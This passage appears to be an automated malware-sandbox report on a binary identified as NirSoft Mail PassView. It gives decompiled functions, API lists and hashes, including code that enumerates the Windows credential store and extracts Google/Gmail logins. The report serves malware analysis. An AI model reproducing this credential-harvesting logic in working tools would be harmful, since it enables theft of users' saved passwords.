                                                                                • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 56%
                                                                                			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                				void _v4103;
                                                                                				char _v4104;
                                                                                				char _t30;
                                                                                				struct HMENU__* _t32;
                                                                                				char _t39;
                                                                                				void* _t42;
                                                                                				struct HWND__* _t43;
                                                                                				struct HMENU__* _t48;
                                                                                
                                                                                				_t42 = __edi;
                                                                                				_t38 = __ecx;
                                                                                				E004118A0(0x1004, __ecx);
                                                                                				_t55 = _a8 - 4;
                                                                                				if(_a8 != 4) {
                                                                                					__eflags = _a8 - 5;
                                                                                					if(_a8 == 5) {
                                                                                						_t39 =  *0x417488;
                                                                                						__eflags = _t39;
                                                                                						if(_t39 == 0) {
                                                                                							L8:
                                                                                							_push(_t42);
                                                                                							sprintf(0x4172c0, "dialog_%d", _a12);
                                                                                							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
                                                                                							_v4104 = 0;
                                                                                							memset( &_v4103, 0, 0x1000);
                                                                                							GetWindowTextA(_t43,  &_v4104, 0x1000);
                                                                                							__eflags = _v4104;
                                                                                							if(__eflags != 0) {
                                                                                								E00407E55(__eflags, "caption",  &_v4104);
                                                                                							}
                                                                                							EnumChildWindows(_t43, E00407FEB, 0);
                                                                                							DestroyWindow(_t43);
                                                                                						} else {
                                                                                							while(1) {
                                                                                								_t30 =  *_t39;
                                                                                								__eflags = _t30;
                                                                                								if(_t30 == 0) {
                                                                                									goto L8;
                                                                                								}
                                                                                								__eflags = _t30 - _a12;
                                                                                								if(_t30 != _a12) {
                                                                                									_t39 = _t39 + 4;
                                                                                									__eflags = _t39;
                                                                                									continue;
                                                                                								}
                                                                                								goto L11;
                                                                                							}
                                                                                							goto L8;
                                                                                						}
                                                                                						L11:
                                                                                					}
                                                                                				} else {
                                                                                					sprintf(0x4172c0, "menu_%d", _a12);
                                                                                					_t32 = LoadMenuA(_a4, _a12);
                                                                                					 *0x4171b4 =  *0x4171b4 & 0x00000000;
                                                                                					_t48 = _t32;
                                                                                					_push(1);
                                                                                					_push(_t48);
                                                                                					_push(_a12);
                                                                                					E00407EFB(_t38, _t55);
                                                                                					DestroyMenu(_t48);
                                                                                				}
                                                                                				return 1;
                                                                                			}












                                                                                APIs
                                                                                • sprintf.MSVCRT ref: 004080C4
                                                                                • LoadMenuA.USER32 ref: 004080D2
                                                                                  • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                                  • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                                  • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                                  • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                                • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                                • sprintf.MSVCRT ref: 00408134
                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                                • memset.MSVCRT ref: 00408165
                                                                                • GetWindowTextA.USER32 ref: 00408176
                                                                                • EnumChildWindows.USER32 ref: 0040819E
                                                                                • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                • API String ID: 3259144588-3822380221
                                                                                • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                                • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E056() {
                                                                                				void* _t1;
                                                                                				_Unknown_base(*)()* _t2;
                                                                                				struct HINSTANCE__* _t4;
                                                                                
                                                                                				if( *0x417514 != 0) {
                                                                                					return _t1;
                                                                                				}
                                                                                				_t2 = GetModuleHandleA("kernel32.dll");
                                                                                				_t4 = _t2;
                                                                                				if(_t4 == 0) {
                                                                                					L9:
                                                                                					return _t2;
                                                                                				}
                                                                                				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                				 *0x416fe0 = _t2;
                                                                                				if(_t2 != 0) {
                                                                                					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                					 *0x416fd8 = _t2;
                                                                                					if(_t2 != 0) {
                                                                                						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                						 *0x416fd4 = _t2;
                                                                                						if(_t2 != 0) {
                                                                                							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                							 *0x416e6c = _t2;
                                                                                							if(_t2 != 0) {
                                                                                								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                								 *0x416fcc = _t2;
                                                                                								if(_t2 != 0) {
                                                                                									 *0x417514 = 1;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				goto L9;
                                                                                			}







                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                • API String ID: 667068680-3953557276
                                                                                • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                                • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
                                                                                				void* __esi;
                                                                                				struct HINSTANCE__* _t12;
                                                                                				struct HINSTANCE__** _t23;
                                                                                
                                                                                				_t23 = __eax;
                                                                                				E004046C2(__eax);
                                                                                				_t12 = LoadLibraryA("advapi32.dll");
                                                                                				 *_t23 = _t12;
                                                                                				if(_t12 != 0) {
                                                                                					_t23[2] = GetProcAddress(_t12, "CredReadA");
                                                                                					_t23[3] = GetProcAddress( *_t23, "CredFree");
                                                                                					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
                                                                                					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
                                                                                					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
                                                                                					if(_t23[2] == 0 || _t23[3] == 0) {
                                                                                						E004046C2(_t23);
                                                                                					} else {
                                                                                						_t23[1] = 1;
                                                                                					}
                                                                                				}
                                                                                				return _t23[1];
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,73AFF420), ref: 004046C9
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                • API String ID: 2449869053-4258758744
                                                                                • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                                • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
                                                                                				void _v8;
                                                                                				void _v12;
                                                                                				void _v24;
                                                                                				char _v39;
                                                                                				void _v40;
                                                                                				char _v132;
                                                                                				void _v1156;
                                                                                				void _v1172;
                                                                                				char _v1180;
                                                                                				void _v1187;
                                                                                				char _v1188;
                                                                                				void _v2228;
                                                                                				void _v2243;
                                                                                				void _v2244;
                                                                                				void _v3267;
                                                                                				char _v3268;
                                                                                				void _v4291;
                                                                                				char _v4292;
                                                                                				char _v5340;
                                                                                				void _v5347;
                                                                                				char _v5348;
                                                                                				char _v6116;
                                                                                				char _v7136;
                                                                                				void _v7140;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				int _t86;
                                                                                				void* _t109;
                                                                                				void* _t122;
                                                                                				void* _t135;
                                                                                				char _t156;
                                                                                				signed char _t168;
                                                                                				signed int _t171;
                                                                                				intOrPtr _t177;
                                                                                				signed int _t183;
                                                                                				void* _t185;
                                                                                
                                                                                				_t171 = __edx;
                                                                                				E004118A0(0x1be4, __ecx);
                                                                                				_t156 = 0;
                                                                                				_v3268 = 0;
                                                                                				memset( &_v3267, 0, 0x3ff);
                                                                                				_a8 = E00410E8A(_a8,  &_v3268);
                                                                                				_t86 = strlen(_a4);
                                                                                				_v8 = _t86;
                                                                                				if(_a8 > 4) {
                                                                                					_t193 = _t86;
                                                                                					if(_t86 > 0) {
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsb");
                                                                                						_v2244 = 0;
                                                                                						memset( &_v2243, 0, 0x41e);
                                                                                						_v1188 = 0;
                                                                                						memset( &_v1187, 0, 0x41e);
                                                                                						_v5348 = 0;
                                                                                						memset( &_v5347, 0, 0x41e);
                                                                                						_v40 = 0;
                                                                                						asm("stosd");
                                                                                						asm("stosd");
                                                                                						asm("stosd");
                                                                                						asm("stosw");
                                                                                						asm("stosb");
                                                                                						_v4292 = 0;
                                                                                						memset( &_v4291, 0, 0x3ff);
                                                                                						E0040BC49( &_v132);
                                                                                						E0040BC6D(_v8,  &_v132, _a4);
                                                                                						_t181 =  &_v132;
                                                                                						E0040BD0B( &_v39,  &_v132,  &_v2244);
                                                                                						memcpy( &_v2228,  &_v24, 8);
                                                                                						E0040BC49( &_v132);
                                                                                						_push( &_v2244);
                                                                                						_t109 = 0x18;
                                                                                						E0040BC6D(_t109,  &_v132);
                                                                                						E0040BD0B( &_v39, _t181,  &_v1188);
                                                                                						memcpy( &_v1172,  &_v2244, 0x10);
                                                                                						memcpy( &_v1156,  &_v24, 8);
                                                                                						E0040BC49(_t181);
                                                                                						_push( &_v1188);
                                                                                						_t122 = 0x28;
                                                                                						E0040BC6D(_t122, _t181);
                                                                                						E0040BD0B( &_v39, _t181,  &_v5348);
                                                                                						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
                                                                                						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
                                                                                						_t177 = _a8;
                                                                                						asm("cdq");
                                                                                						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
                                                                                						_a4 = 0;
                                                                                						if(_t183 > 0) {
                                                                                							do {
                                                                                								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
                                                                                								_a4 =  &(_a4[1]);
                                                                                							} while (_a4 < _t183);
                                                                                							_t177 = _a8;
                                                                                						}
                                                                                						_t135 = 0;
                                                                                						if(_t177 > _t156) {
                                                                                							do {
                                                                                								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
                                                                                								_t135 = _t135 + 1;
                                                                                								 *(_t185 + _t135 - 0x1be1) = _t168;
                                                                                							} while (_t135 < _t177);
                                                                                						}
                                                                                						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
                                                                                						strcpy(_a12,  &_v7136);
                                                                                						E0040BC49( &_v132);
                                                                                						_t67 = _t177 - 4; // 0x0
                                                                                						E0040BC6D(_t67,  &_v132, _a12);
                                                                                						E0040BD0B(_t177,  &_v132,  &_v40);
                                                                                						memcpy( &_v8,  &_v40, 4);
                                                                                						memcpy( &_v12,  &_v7140, 4);
                                                                                						_t156 = 1;
                                                                                						 *_a16 = 0 | _v8 == _v12;
                                                                                					}
                                                                                				}
                                                                                				return _t156;
                                                                                			}


                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041103A
                                                                                  • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                • strlen.MSVCRT ref: 00411056
                                                                                • memset.MSVCRT ref: 00411090
                                                                                • memset.MSVCRT ref: 004110A4
                                                                                • memset.MSVCRT ref: 004110B8
                                                                                • memset.MSVCRT ref: 004110DE
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                  • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                • memcpy.MSVCRT ref: 00411115
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                • memcpy.MSVCRT ref: 00411151
                                                                                • memcpy.MSVCRT ref: 00411163
                                                                                • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                                • memcpy.MSVCRT ref: 0041126B
                                                                                • memcpy.MSVCRT ref: 0041127D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen$strcpy
                                                                                • String ID: salu
                                                                                • API String ID: 2660478486-4177317985
                                                                                • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                                • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
                                                                                			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				char _v76;
                                                                                				void _v1099;
                                                                                				char _v1100;
                                                                                				void _v2123;
                                                                                				char _v2124;
                                                                                				void _v3147;
                                                                                				char _v3148;
                                                                                				char _v4172;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* _t36;
                                                                                				void* _t37;
                                                                                				void* _t48;
                                                                                				void* _t55;
                                                                                				intOrPtr* _t56;
                                                                                				signed int _t58;
                                                                                				intOrPtr* _t63;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                
                                                                                				_t56 = __ecx;
                                                                                				E004118A0(0x1048, __ecx);
                                                                                				_t63 = _t56;
                                                                                				_v8 = _t63;
                                                                                				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                				_v1100 = 0;
                                                                                				memset( &_v1099, 0, 0x3ff);
                                                                                				_v3148 = 0;
                                                                                				memset( &_v3147, 0, 0x3ff);
                                                                                				_v2124 = 0;
                                                                                				memset( &_v2123, 0, 0x3ff);
                                                                                				_t71 = _t70 + 0x2c;
                                                                                				if( *0x417308 != 0) {
                                                                                					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
                                                                                					_t71 = _t71 + 0xc;
                                                                                				}
                                                                                				if( *0x417304 != 0) {
                                                                                					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
                                                                                				}
                                                                                				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                                                                				_t58 = 0x10;
                                                                                				_push(_t36);
                                                                                				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
                                                                                				asm("movsb");
                                                                                				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
                                                                                				E00405EFD(_a4,  &_v4172);
                                                                                				_push("Mail PassView");
                                                                                				_t55 = 6;
                                                                                				_push(E004078FF(_t55));
                                                                                				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                				_t48 = E00405EFD(_a4,  &_v2124);
                                                                                				_t78 = _a8 - 4;
                                                                                				if(_a8 == 4) {
                                                                                					return E004097E6(_v8, _t78, _a4);
                                                                                				}
                                                                                				return _t48;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                • memset.MSVCRT ref: 00403EBF
                                                                                • memset.MSVCRT ref: 00403ED3
                                                                                • memset.MSVCRT ref: 00403EE7
                                                                                • sprintf.MSVCRT ref: 00403F08
                                                                                • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                                • sprintf.MSVCRT ref: 00403F5B
                                                                                • sprintf.MSVCRT ref: 00403F8C
                                                                                Strings
                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                                • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                                • Mail PassView, xrefs: 00403F72
                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                                • API String ID: 1043021993-495024357
                                                                                • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                                • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
                                                                                				intOrPtr _v8;
                                                                                				char _v280;
                                                                                				char _v408;
                                                                                				intOrPtr _v412;
                                                                                				char _v796;
                                                                                				intOrPtr _v800;
                                                                                				char _v928;
                                                                                				char _v940;
                                                                                				wchar_t* _t23;
                                                                                				char* _t41;
                                                                                				wchar_t** _t59;
                                                                                				void* _t76;
                                                                                
                                                                                				_t76 = __fp0;
                                                                                				_t59 = _a4;
                                                                                				_t23 =  *_t59;
                                                                                				_v8 = __ecx;
                                                                                				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
                                                                                					E004021D8( &_v940);
                                                                                					_v800 = 7;
                                                                                					_v412 = 3;
                                                                                					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
                                                                                					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
                                                                                					strcpy( &_v928,  &_v408);
                                                                                					strcpy( &_v796,  &_v408);
                                                                                					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
                                                                                						sprintf( &_v796, "%s@gmail.com",  &_v408);
                                                                                					}
                                                                                					_t41 = strchr( &_v928, 0x40);
                                                                                					if(_t41 != 0) {
                                                                                						 *_t41 = 0;
                                                                                					}
                                                                                					E00402407( &_v940, _t76, _v8 + 0xfffff788);
                                                                                				}
                                                                                				return 1;
                                                                                			}

                                                                                APIs
                                                                                • wcsstr.MSVCRT ref: 004042BD
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                                • strcpy.MSVCRT(?,?), ref: 00404328
                                                                                • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                                • strchr.MSVCRT ref: 00404349
                                                                                • strlen.MSVCRT ref: 0040435D
                                                                                • sprintf.MSVCRT ref: 0040437E
                                                                                • strchr.MSVCRT ref: 0040438F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                • API String ID: 1359934567-4070641962
                                                                                • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                                • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
                                                                                				void _v4103;
                                                                                				char _v4104;
                                                                                				int _t21;
                                                                                				int _t28;
                                                                                				void* _t35;
                                                                                
                                                                                				_t35 = __eflags;
                                                                                				E004118A0(0x1004, __ecx);
                                                                                				strcpy(0x4171b8, _a8);
                                                                                				strcpy(0x4172c0, "general");
                                                                                				E00407E55(_t35, "TranslatorName", 0x412466);
                                                                                				E00407E55(_t35, "TranslatorURL", 0x412466);
                                                                                				EnumResourceNamesA(_a4, 4, E004080A3, 0);
                                                                                				EnumResourceNamesA(_a4, 5, E004080A3, 0);
                                                                                				strcpy(0x4172c0, "strings");
                                                                                				_t28 = 0;
                                                                                				_v4104 = 0;
                                                                                				memset( &_v4103, 0, 0x1000);
                                                                                				do {
                                                                                					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
                                                                                					if(_t21 > 0) {
                                                                                						_t21 = E00407EC3(_t28,  &_v4104);
                                                                                					}
                                                                                					_t28 = _t28 + 1;
                                                                                				} while (_t28 <= 0xffff);
                                                                                				 *0x4171b8 = 0;
                                                                                				return _t21;
                                                                                			}

                                                                                APIs
                                                                                • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                                                • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                                  • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                                  • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                                  • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                                                • EnumResourceNamesA.KERNEL32(00000104,00000004,004080A3,00000000), ref: 004082D8
                                                                                • EnumResourceNamesA.KERNEL32(00000104,00000005,004080A3,00000000), ref: 004082E2
                                                                                • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                                                • memset.MSVCRT ref: 00408306
                                                                                • LoadStringA.USER32 ref: 0040831A
                                                                                  • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                • API String ID: 1060401815-3647959541
                                                                                • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                                                • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                				void _v267;
                                                                                				char _v268;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t31;
                                                                                				int _t40;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				char* _t50;
                                                                                				void* _t57;
                                                                                				int _t62;
                                                                                				char* _t68;
                                                                                				void* _t70;
                                                                                				void* _t73;
                                                                                				void* _t74;
                                                                                				intOrPtr* _t86;
                                                                                				char* _t89;
                                                                                				void* _t90;
                                                                                				char** _t91;
                                                                                
                                                                                				_t86 = __eax;
                                                                                				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
                                                                                				_t94 = _t31;
                                                                                				if(_t31 == 0) {
                                                                                					__eflags = 0;
                                                                                					return 0;
                                                                                				}
                                                                                				E0040462E(_t86 + 0x468);
                                                                                				_t68 = _t86 + 0x158;
                                                                                				E004061FF(_t68, _a4);
                                                                                				_t89 = _t86 + 0x25d;
                                                                                				 *_t89 = 0;
                                                                                				E0040C530(_t94, _t86 + 0x18);
                                                                                				if( *_t89 == 0) {
